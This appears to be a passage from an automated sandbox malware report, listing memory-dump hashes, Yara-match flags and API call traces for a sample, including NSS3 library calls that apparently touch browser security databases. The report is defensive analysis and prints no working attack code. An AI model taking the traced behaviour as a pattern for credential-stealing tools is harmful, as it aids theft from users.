                                                                                                                                                                                                              • Opcode ID: 61bb9c6ab39ad82d2954a0b5d6995b26d1fa9c3173d88bccf4b92510426349f3
                                                                                                                                                                                                              • Instruction ID: 1b9d0fd8b5cb18a9de86283f00ed916fc77780997f50cfaa5be9f82c009d95b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61bb9c6ab39ad82d2954a0b5d6995b26d1fa9c3173d88bccf4b92510426349f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82F15B75A022458FDB08CF29D484BAE77B2FF89314F294169D8099B751CB35ED42CBE1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                              • Instruction ID: 4c31ff1ae535b109e604966c9c865672060b4b5e1e47d70ddb11156256d80b9b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CC17E73D1F5B2098B36862D4418A3FEEA66ED2B4431FC3D5DCD03F189C62AAD1596D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                              • Instruction ID: b15ec31062bf8dc61e30e74784bb79935ce897ae0488cf6c9514903a89fbe662
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAC19F77D0F9B2098B364A2D4458A3FFEA66ED2B4531FC395DCD03F189C22AAD0596D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                              • Instruction ID: 693656ca8142a438b02db072a615d211d43689dc8d5376d12e265abfb701df79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3D13532A146968BDB118E18C8843FA7763AB85338F5D4728C8685B7C6C37FDD0587D2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                              • Instruction ID: 4e0332c5aaa8162b1dc6b0953202ea51c0e9b5247c464dff352c341e0da40d67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2FC18F77D1F5B2498B364A2D0418A3FFEA66ED2B4531FC3A5DCD03F289C226AD0596D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                              • Instruction ID: b6670e9a80155fd9680b1af9f7c5facb7937bea83680c9ab9f97591c15a6ed5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DB19F77D1F5B20A8B368A2D0418A3FFEA66ED1B4531FC3A5DCD03F189C626AD0596D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a968d21191cb63698916886c79358013f4d5741620fbd4374891354843b0d45d
                                                                                                                                                                                                              • Instruction ID: d3cfd6876460ef843d6fb011efb813c8879526c52c0ec6b527c8d08f880a64fd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a968d21191cb63698916886c79358013f4d5741620fbd4374891354843b0d45d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B151D1739142159BEB18CF69C4817E9B3B5EFC4308F2544BDCC4AEF286EA706945CB50
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f07bdc3382fd0279d40e9b1c6e8f033757f8a34f0bc61fb9ff9b218ea82275d9
                                                                                                                                                                                                              • Instruction ID: 23214e939a419036a9eaeb9c52f81eaf4e1e4d51de359b076d64c94b882d1a79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f07bdc3382fd0279d40e9b1c6e8f033757f8a34f0bc61fb9ff9b218ea82275d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D221EE21578FE205C7844BF9FCC022267D1CBCF21BB9D8269DF90CA172C16DE6229650
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ea87c73c5773f72137c6f03310358a8212b73388e68c81cb6b74eabc986878f5
                                                                                                                                                                                                              • Instruction ID: 9b0549ba9674e2e14b7e560e634be8919d1a531f561495d0b2d389e67708a367
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea87c73c5773f72137c6f03310358a8212b73388e68c81cb6b74eabc986878f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93218EB5D0020A8FCB54CFA9D4816EEFBF4BB48320F50846ECA56F3350E634AA458F94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: de2d6bd9db4af2e5e06bd64b293302a958f6bca6cb73e39252b4056ee4eb4ef4
                                                                                                                                                                                                              • Instruction ID: 9cbdd396941f3d90ed7396a4c9f2317f62dea394e91725f50f6df6655a1445eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: de2d6bd9db4af2e5e06bd64b293302a958f6bca6cb73e39252b4056ee4eb4ef4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE119132A012169FD704DF29D884B5AB7B9FF4231CF08426AE8059FA41C775E8C6C7D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3b4ec5b75263d7c1d41ce4d16aca12e521e00b2307261b195d0859d015bba3aa
                                                                                                                                                                                                              • Instruction ID: f25226c78a56607fa7541831fee0f029961824bb23eccf727036bf7f9268d34a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b4ec5b75263d7c1d41ce4d16aca12e521e00b2307261b195d0859d015bba3aa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11E3747043459FCB00DF19D88066A7BB2FF8A368F14807DD8198B701DB31E846CBA1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                              • Instruction ID: 4b8e3e1a866ac8be8d2abadf4782c5161e07e8129ecdc159ff052f77b580bcbd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E0653A2020A467DB148E09D4506A97359DF8B615FA48079CC699BA02D633F9038781
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                              • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                                              • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                              • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                              • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0092DB54: lstrlenA.KERNEL32(?,75B65460,?,00000000), ref: 0092DB90
                                                                                                                                                                                                                • Part of subcall function 0092DB54: strchr.MSVCRT ref: 0092DBA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,75B65460,?,00000000), ref: 0092DCD9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DCE0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DCF5
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DCFC
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DD18
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DD2A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DD37
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0092DD68
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DD6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092DD76
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DD7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DD92
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DD99
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DDAF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DDC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DDC8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0092DDE6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DDED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092DDF4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DDFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DE10
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE17
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DE27
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DE39
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0092DE68
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092DE76
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DE7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DE98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DE9F
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DEB2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DEC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DECB
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092DED4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0092DEEA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DEF1
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0092DF09
                                                                                                                                                                                                                • Part of subcall function 0092F0FD: std::_Xinvalid_argument.LIBCPMT ref: 0092F113
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DF4A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0092DF70
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DF7D
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092DF82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0092DF91
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092DF98
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DFAC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DFB3
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092DFC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092DFCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092DFD5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E00A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E011
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 0092E018
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0092E01F
                                                                                                                                                                                                              • strcpy_s.MSVCRT ref: 0092E03A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E04C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E053
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E0F7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E0FE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0092E148
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0092E14F
                                                                                                                                                                                                                • Part of subcall function 0092DB54: strchr.MSVCRT ref: 0092DBC7
                                                                                                                                                                                                                • Part of subcall function 0092DB54: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBE9
                                                                                                                                                                                                                • Part of subcall function 0092DB54: GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0092DBF6
                                                                                                                                                                                                                • Part of subcall function 0092DB54: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0092DCCC), ref: 0092DBFD
                                                                                                                                                                                                                • Part of subcall function 0092DB54: strcpy_s.MSVCRT ref: 0092DC44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$strchr$Xinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 838878465-0
                                                                                                                                                                                                              • Opcode ID: a05368d7efb706c74c494a5f0a941addccec4e6688978375d514aed5a019e490
                                                                                                                                                                                                              • Instruction ID: 489781cc3ef3e4f13773f2124f1c7190cd853568656e902a728e2a384930c98a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a05368d7efb706c74c494a5f0a941addccec4e6688978375d514aed5a019e490
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50E11A72C04228AFEF21AFF0EC89ADDBF78AF48301F25446AF615A7152DA359484DF54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CB25E08
                                                                                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB25E3F
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CB25E5C
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25E7E
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25E97
                                                                                                                                                                                                              • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CB25EA5
                                                                                                                                                                                                              • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CB25EBB
                                                                                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB25ECB
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CB25EF0
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25F12
                                                                                                                                                                                                              • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CB25F35
                                                                                                                                                                                                              • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CB25F5B
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB25F82
